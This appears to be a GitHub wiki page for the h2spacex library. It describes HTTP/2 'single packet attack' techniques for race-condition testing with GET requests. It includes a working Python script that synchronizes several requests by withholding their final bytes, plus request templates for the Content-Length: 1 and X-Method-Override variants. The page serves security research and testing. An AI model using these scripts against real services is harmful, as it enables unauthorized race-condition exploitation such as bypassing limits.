GET SPA Methods

Single Packet Attack in GET Requests

although Single Packet Attack in GET Requests is not like POST Requests, there are some methods which can help you exploit in some cases.

Remove END_STREAM

Remove END_STREAM flag and send the last bytes together.

from h2spacex import H2OnTlsConnection
from time import sleep
from h2spacex import h2_frames


# change this host name to new generated one
host = 'example.com'
h2_conn = H2OnTlsConnection(
    hostname=host,
    port_number=443
)

h2_conn.setup_connection()

headers = """HEADERS
...
"""

try_num = 3

stream_ids_list = h2_conn.generate_stream_ids(number_of_streams=try_num)

all_headers_frames = []  # all headers frame + data frames which have not the last byte
all_data_frames = []  # all data frames which contain the last byte

for i in range(0, try_num):

    header_frames_without_last_byte, last_data_frame_with_last_byte = h2_conn.create_single_packet_http2_get_request_frames(  # noqa: E501
        method='GET',
        headers_string=headers,
        scheme='https',
        stream_id=stream_ids_list[i],
        authority=host,
        path='/',
        body=None
    )

    all_headers_frames.append(header_frames_without_last_byte)
    all_data_frames.append(last_data_frame_with_last_byte)


# concatenate all headers bytes
temp_headers_bytes = b''
for h in all_headers_frames:
    temp_headers_bytes += bytes(h)

# concatenate all data frames which have last byte
temp_data_bytes = b''
for d in all_data_frames:
    temp_data_bytes += bytes(d)

h2_conn.send_bytes(temp_headers_bytes)

# # wait some time
sleep(0.1)

# send ping frame to warm up connection
h2_conn.send_ping_frame()

# send remaining data frames
h2_conn.send_bytes(temp_data_bytes)

resp = h2_conn.read_response_from_socket(_timeout=3)
frame_parser = h2_frames.FrameParser(h2_connection=h2_conn)
frame_parser.add_frames(resp)
frame_parser.show_response_of_sent_requests()

sleep(3)
h2_conn.close_connection()

Content-Length: 1 Method

Some servers wait when they see Content-Length Header in GET requests, so that you can use this method to exploit the attack.

Send Multiple Requests like this:

.
content-length: 1
OTHER_HEADERS
.

And send a DATA frame containing 1 byte for each request in a single packet.

X-Method-Override Method

X-Method-Override or X-HTTP-Method-Override Header

Send POST request with x-method-override or x-http-method-override headers and send 1 byte in a DATA frame for each request.

:method: POST
OTHER_HEADERS
x-method-override: GET
+
DATA_FRAME
.

X-Method-Override or X-HTTP-Method-Override URL Parameter

Send POST request with x-method-override or x-http-method-override URL parameters and send 1 byte in a DATA frame for each request.

:method: POST
:path: /path?x-method-override=GET
OTHER_HEADERS
+
DATA_FRAME
.

References & Resources

I also got some ideas from a previous developed library h2tinker.

Finally, thanks again to James Kettle for directly helping and pointing some other techniques.

TODO

Single Packet Attack - POST &...
- implement
Single Packet Attack - GET
- Remove END_STREAM flag
- Content-Length: 1 Method
- POST Request with x-override-method: GET header
Response Parsing
- implement
- implement threaded response parser
- Body Decompression
  - gzip
  - br
  - deflate
Proxy
- Socks5 Proxy

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

GET SPA Methods

Single Packet Attack in GET Requests

Remove END_STREAM

Content-Length: 1 Method

X-Method-Override Method

X-Method-Override or X-HTTP-Method-Override Header

X-Method-Override or X-HTTP-Method-Override URL Parameter

References & Resources

Uh oh!

Uh oh!

Uh oh!

TODO

Clone this wiki locally